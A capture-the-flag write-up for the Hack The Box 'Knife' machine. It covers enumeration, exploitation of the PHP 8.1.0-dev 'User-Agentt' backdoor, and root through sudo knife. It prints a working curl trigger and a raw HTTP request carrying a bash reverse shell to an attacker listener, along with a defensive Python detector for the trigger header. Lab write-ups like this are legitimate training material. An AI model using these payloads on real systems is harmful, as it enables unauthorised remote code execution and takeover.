Summary
Knife is an extremely easy box that really shows the range of difficulties that can sit within the "easy" band of Hack The Box ratings. This box caters to beginners and the experienced alike: you can simply copy and paste a public exploit script for your initial foothold, or craft the request syntax yourself to make the exploit work.
Tools used
Autorecon
Linpeas
Whatweb
Processes/Techniques
Webshell hijacking
Command injection to code execution
Linpeas privilege escalation enumeration
SETUID
References
Enumeration
As usual we start off with a basic Nmap scan to see what we are working with, and initially our attack surface looks fairly narrow. As a result we run a second-stage scan to enumerate version information, with assistance from the Nmap Scripting Engine (NSE), using the following flags.
-sC - use default enumeration scripts
-sV - version enumeration
Our more in-depth Nmap scan shows the expected SSH service, followed by an HTTP website identified by the title "Emergent Medical Idea". This is useful information.
I noticed that port 1839 did not show up on the in-depth scan.
We run a targeted scan against port 1839 with the -Pn flag, which skips host discovery (the ping probe), in case the firewall has a rate threshold that the scripting engine's extra traffic would trip. This turns out not to be the case, and we get no further information.
Enumeration AutoRecon
As always, I like to start AutoRecon in the background after my initial enumeration to pick up any bits and pieces I may have left behind. This can sometimes take up to 30 minutes, so we will check back later.
Enumeration HTTP
Upon browsing to port 80 we can see that this website is likely attributed to the medical field.
Directory Buster
I start off by running a directory buster in the background to look for hidden directories while I invest time actively enumerating the website. Unfortunately it turns up no hidden directories.
I was not able to click any of the sub-menus in the upper right corner, which was quite weird and suggested that perhaps the page was still under development.
Page inspection
I proceeded to check the page source and, other than some basic scripts and formatting, there was nothing interesting.
Auto Recon
Let's check back on AutoRecon and see if anything was picked up over port 80 that I perhaps missed with only a surface level scan.
Browsing into the AutoRecon scans directory shows us many reports that we can view, and we will go straight to the WhatWeb results. If you don't already know it, WhatWeb is a very powerful tool for fingerprinting web technologies. The results are listed below.
WhatWeb report for http://10.129.216.29:80
Status : 200 OK
Title : Emergent Medical Idea
IP : 10.129.216.29
Country : RESERVED, ZZ
Summary : PHP[8.1.0-dev], Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 8.1.0-dev
Google Dorks: (2)
Website : http://www.php.net/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/8.1.0-dev (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 01:58:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2406
Connection: close
Content-Type: text/html; charset=UTF-8
Reviewing the output shows us that the website is served by PHP, and in particular version 8.1.0-dev. So let's take a closer look at this, as 8.1.0-dev is a development build rather than a released version.
Enumeration - PHP version 8.1.0-dev
I came across a popular exploit on Exploit-DB. It is not entirely straightforward and involves researching the exploit and tampering with the User-Agent field.
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
Here we go through the Exploit-DB and PacketStorm entries and, after trying to execute system commands manually through the user agent, we resort to the curl command.
CVE - Exploit DB -
https://www.exploit-db.com/exploits/49933
CVE - PacketStorm
https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html
Code injection - curl
Eventually we solve this with the curl command.
curl -i -H "User-Agentt: zerodiumsystem('id');" http://10.129.225.112/AAAA.php
Backdoor - Burpsuite
We also solve this by tinkering with the request syntax in Burp Suite, which eventually works and provides the callback to our listener.
GET /aaa.php HTTP/1.1
Host: 10.129.225.112
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.44/6363 0>&1'");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Our netcat listener catches the reverse shell.
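From the defender's side, the trigger used above is easy to spot but easy to miss: the backdoored build reacts to a header named User-Agentt (two t's) whose value contains the string zerodium, and Apache's default combined log format only records the normal User-Agent header, so the trigger never appears in access.log. The following is an added example, not part of this writeup, that inspects raw HTTP requests captured at a proxy or WAF and flags the backdoor trigger; the sample requests are constructed here and the helper names are my own.

```python
"""Flag HTTP requests that trigger the PHP 8.1.0-dev 'User-Agentt' backdoor.

The backdoored build checks the User-Agentt header for the string 'zerodium'
and evaluates the rest of the header value as PHP. The default Apache access
log does not record custom headers, so this must run over a full-header
capture (reverse proxy, WAF or packet capture), not over access.log.
"""

TRIGGER_HEADER = "user-agentt"
TRIGGER_MARKER = "zerodium"


def parse_headers(raw_request: str) -> dict:
    """Map lowercased header names to values from a raw HTTP request text."""
    lines = raw_request.replace("\r\n", "\n").split("\n")
    headers = {}
    for line in lines[1:]:          # skip the request line
        if not line.strip():        # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def check_request(raw_request: str):
    """Return (triggered, payload). payload is the text the backdoor would
    evaluate: the backdoor strips the first 8 bytes ('zerodium') from the
    header value, so it is only meaningful when the marker leads the value."""
    value = parse_headers(raw_request).get(TRIGGER_HEADER)
    if value is None or TRIGGER_MARKER not in value.lower():
        return False, None
    return True, value[len(TRIGGER_MARKER):]


# Constructed samples: the curl request from the writeup and a benign request.
TRIGGER_REQUEST = (
    "GET /AAAA.php HTTP/1.1\r\n"
    "Host: 10.129.225.112\r\n"
    "User-Agentt: zerodiumsystem('id');\r\n\r\n"
)
BENIGN_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 10.129.225.112\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

if __name__ == "__main__":
    for req in (TRIGGER_REQUEST, BENIGN_REQUEST):
        print(check_request(req))
```

A WAF rule that blocks or alerts on any request carrying a User-Agentt header achieves the same effect with no parsing, since no legitimate client sends that header.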
Root
I am largely in the habit of uploading privilege enumeration scripts such as linpeas, however I always check for low-hanging fruit first. Running "sudo -l" we actually get a result, which is likely the path to root.
sudo -l
Knife enumeration and GTFOBins
After tampering with the knife binary, and failing to inject code or abuse the symbolic link, I eventually looked it up on GTFOBins, where I found the sudo abuse entry, and we made our way to root.
https://gtfobins.github.io/gtfobins/knife/
Root